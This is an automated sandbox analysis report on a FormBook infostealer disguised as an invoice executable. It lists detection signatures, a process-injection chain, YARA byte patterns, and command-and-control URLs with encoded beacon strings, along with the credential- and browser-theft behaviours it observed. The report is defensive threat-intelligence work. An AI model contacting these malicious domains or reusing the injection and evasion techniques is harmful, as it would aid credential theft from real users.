Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice_&_SOA_ready_for_dispatch.exe

Overview

General Information

Sample Name:Invoice_&_SOA_ready_for_dispatch.exe
Analysis ID:1340403
MD5:eea9bf4a16ab377328a59bde0a0c76df
SHA1:d6015abe7bd2ac246af5656410c7f7c7dc5f5637
SHA256:fd2ac4af2e4d90f117a8ba49d77cc480f0ad6a8a6cfa7479384d68ce27939f1a
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Invoice_&_SOA_ready_for_dispatch.exe (PID: 7784 cmdline: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe MD5: EEA9BF4A16AB377328A59BDE0A0C76DF)
    • RegSvcs.exe (PID: 7940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7948 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • xIXlFDyvSnsfUSfsjsGwj.exe (PID: 6900 cmdline: "C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fontview.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\fontview.exe MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)
          • xIXlFDyvSnsfUSfsjsGwj.exe (PID: 1180 cmdline: "C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3660 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x27cc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2b053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2a253:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Invoice_&_SOA_ready_for_dispatch.exeReversingLabs: Detection: 42%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sample
            Source: Invoice_&_SOA_ready_for_dispatch.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.littlehappiez.com/udwf/Avira URL Cloud: Label: malware
            Source: http://www.littlehappiez.com/udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.otternaut.live/udwf/?G0Yxd2Q=pZ4HfquroA03Gi5vNwF4ItLuSTGmPoiR8InmRf339X8P+rCcKVr0Urjn620xlb/Iiubkhpo0DqZ1bcej5UiuLGGOXANOCS2GgQ==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.tutorwave.online/udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.xn--4gq62f8w1alm9b.xyz/udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.diabloseugene.com/udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.spark-tech-global.xyz/udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03Avira URL Cloud: Label: malware
            Source: http://www.tutorwave.online/udwf/Avira URL Cloud: Label: malware
            Source: http://www.xn--4gq62f8w1alm9b.xyz/udwf/Avira URL Cloud: Label: malware
            Source: http://www.bellcom.media/udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1Avira URL Cloud: Label: malware
            Source: http://www.diabloseugene.com/udwf/Avira URL Cloud: Label: malware
            Source: http://www.bellcom.media/udwf/Avira URL Cloud: Label: malware
            Source: http://www.spark-tech-global.xyz/udwf/Avira URL Cloud: Label: malware
            Source: http://www.otternaut.live/udwf/Avira URL Cloud: Label: malware
            Machine Learning detection for sample
            Source: Invoice_&_SOA_ready_for_dispatch.exeJoe Sandbox ML: detected
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdb source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274005512.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3728661562.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: RegSvcs.pdb, source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: firefox.pdb source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A4C300 FindFirstFileW,FindNextFileW,FindClose,12_2_02A4C300
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then pop edi12_2_02A41AC0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then xor eax, eax12_2_02A399B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then pop edi12_2_02A3E36F
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then pop edi12_2_02A41ABF

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.spark-tech-global.xyz
            Source: DNS query: www.xn--4gq62f8w1alm9b.xyz
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:45 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:45 GMT; SameSite=LaxSet-Cookie: _shopify_y=4449291f-7672-4969-ab63-6c8c671c5b94; Expires=Sat, 09-Nov-24 08:27:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=598daef1-c1fc-4481-949d-30a60bd7f1d1; Expires=Fri, 10-Nov-23 08:57:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=137X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8cd67cc6-53bc-44cData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:48 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:48 GMT; SameSite=LaxSet-Cookie: _shopify_y=1c95b64a-cbaf-4aa7-b895-a0d261c3e83b; Expires=Sat, 09-Nov-24 08:27:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=589267fe-b53a-4fab-acae-faae851dc44c; Expires=Fri, 10-Nov-23 08:57:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=426X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=1e7f5e7f-acb5-464Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:27:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:50 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:51 GMT; SameSite=LaxSet-Cookie: _shopify_y=8e7d96c0-29b1-4ebb-bc12-0695b29b2f51; Expires=Sat, 09-Nov-24 08:27:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=5a1d3429-a0f5-43f8-a851-d97cd1a79574; Expires=Fri, 10-Nov-23 08:57:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=155X-Shopify-Stage: productionContent-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ed4b21a8-ae7c-4d8Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Nov 2023 08:28:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
